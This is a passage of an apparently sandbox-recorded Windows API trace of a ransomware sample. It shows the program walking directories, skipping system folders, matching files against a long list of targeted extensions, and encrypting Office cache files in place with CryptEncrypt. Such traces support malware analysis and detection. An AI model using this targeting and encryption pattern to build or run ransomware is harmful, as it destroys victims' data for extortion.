dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0027.214] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=50823389) returned 1 [0027.214] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x30780ff, lpName=0x0) returned 0x230 [0027.214] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0027.214] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x3070000, dwNumberOfBytesToMap=0x80dd) returned 0xa0000 [0027.216] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.216] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1000000) returned 0x3240000 [0027.217] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000, dwBufLen=0x30780dd | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000) returned 1 [0027.709] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x1000000) returned 1 [0027.834] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0027.861] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0027.861] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x3070000, dwNumberOfBytesToMap=0x80ff) returned 0xa0000 [0027.862] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0027.862] CryptHashData (hHash=0x368430, pbData=0xa80d9, dwDataLen=0x4, dwFlags=0x0) returned 1 [0027.862] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0027.862] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0027.862] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x80ff) returned 1 [0027.879] LocalFree (hMem=0x36ea40) returned 0x0 [0027.879] CryptDestroyHash (hHash=0x368430) returned 1 [0027.879] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0027.879] CloseHandle (hObject=0x230) returned 1 [0027.879] CloseHandle (hObject=0x22c) returned 1 [0028.025] CryptDestroyKey (hKey=0x3683b0) returned 1 [0028.025] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.025] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.025] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", pszFile="VisioMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" [0028.026] PathFindExtensionW (pszPath="VisioMUI.msi") returned=".msi" [0028.026] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0028.026] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.026] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.026] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", pszFile="VisioMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" [0028.026] PathFindExtensionW (pszPath="VisioMUI.xml") returned=".xml" [0028.026] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0028.026] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0028.026] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0028.026] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=9503) returned 1 [0028.026] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2542, lpName=0x0) returned 0x230 [0028.026] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.026] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x251f) returned 0xa0000 [0028.027] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.028] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x251f) returned 0xa0000 [0028.028] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x251f, dwBufLen=0x2520 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x2520) returned 1 [0028.029] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x2520) returned 1 [0028.029] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.030] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.030] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2542) returned 0xa0000 [0028.031] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0028.031] CryptHashData (hHash=0x368430, pbData=0xa251c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0028.031] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0028.031] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0028.031] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x2542) returned 1 [0028.031] LocalFree (hMem=0x36ea40) returned 0x0 [0028.031] CryptDestroyHash (hHash=0x368430) returned 1 [0028.032] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.032] CloseHandle (hObject=0x230) returned 1 [0028.032] CloseHandle (hObject=0x22c) returned 1 [0028.032] CryptDestroyKey (hKey=0x3683b0) returned 1 [0028.032] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0028.032] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0028.032] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0028.032] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.032] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-00A1-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C" [0028.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0028.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0028.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0028.032] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0028.032] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*" [0028.032] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0028.048] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.048] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.048] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.049] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.049] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.049] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", pszFile="OneNoteMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" [0028.049] PathFindExtensionW (pszPath="OneNoteMUI.msi") returned=".msi" [0028.049] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0028.049] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.049] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.049] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", pszFile="OneNoteMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" [0028.049] PathFindExtensionW (pszPath="OneNoteMUI.xml") returned=".xml" [0028.049] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0028.049] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0028.049] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0028.049] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1606) returned 1 [0028.049] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x672, lpName=0x0) returned 0x230 [0028.049] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.049] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x646) returned 0xa0000 [0028.061] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.062] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x646) returned 0xa0000 [0028.063] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x646, dwBufLen=0x650 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x650) returned 1 [0028.063] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x650) returned 1 [0028.070] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.070] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.070] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x672) returned 0xa0000 [0028.072] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0028.072] CryptHashData (hHash=0x368430, pbData=0xa064c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0028.072] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0028.072] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0028.072] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x672) returned 1 [0028.072] LocalFree (hMem=0x36ea40) returned 0x0 [0028.072] CryptDestroyHash (hHash=0x368430) returned 1 [0028.072] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.073] CloseHandle (hObject=0x230) returned 1 [0028.073] CloseHandle (hObject=0x22c) returned 1 [0028.073] CryptDestroyKey (hKey=0x3683b0) returned 1 [0028.073] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.073] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.073] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", pszFile="OnoteLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" [0028.073] PathFindExtensionW (pszPath="OnoteLR.cab") returned=".cab" [0028.073] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0028.073] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0028.073] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0028.074] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=17456632) returned 1 [0028.074] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10a5e1a, lpName=0x0) returned 0x230 [0028.074] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.074] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x10a0000, dwNumberOfBytesToMap=0x5df8) returned 0xa0000 [0028.084] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.085] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1000000) returned 0x3240000 [0028.086] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000, dwBufLen=0x10a5df8 | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x1000000) returned 1 [0028.664] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x1000000) returned 1 [0028.762] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0028.784] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0028.784] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x10a0000, dwNumberOfBytesToMap=0x5e1a) returned 0xa0000 [0028.785] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0028.785] CryptHashData (hHash=0x368430, pbData=0xa5df4, dwDataLen=0x4, dwFlags=0x0) returned 1 [0028.785] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0028.785] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0028.785] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x5e1a) returned 1 [0028.786] LocalFree (hMem=0x36ea40) returned 0x0 [0028.786] CryptDestroyHash (hHash=0x368430) returned 1 [0028.786] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0028.786] CloseHandle (hObject=0x230) returned 1 [0028.786] CloseHandle (hObject=0x22c) returned 1 [0028.786] CryptDestroyKey (hKey=0x3683b0) returned 1 [0028.786] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0028.786] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0028.786] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" [0028.786] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0028.786] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0028.786] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0028.786] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0028.788] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1988) returned 1 [0028.788] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f2, lpName=0x0) returned 0x230 [0028.788] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: 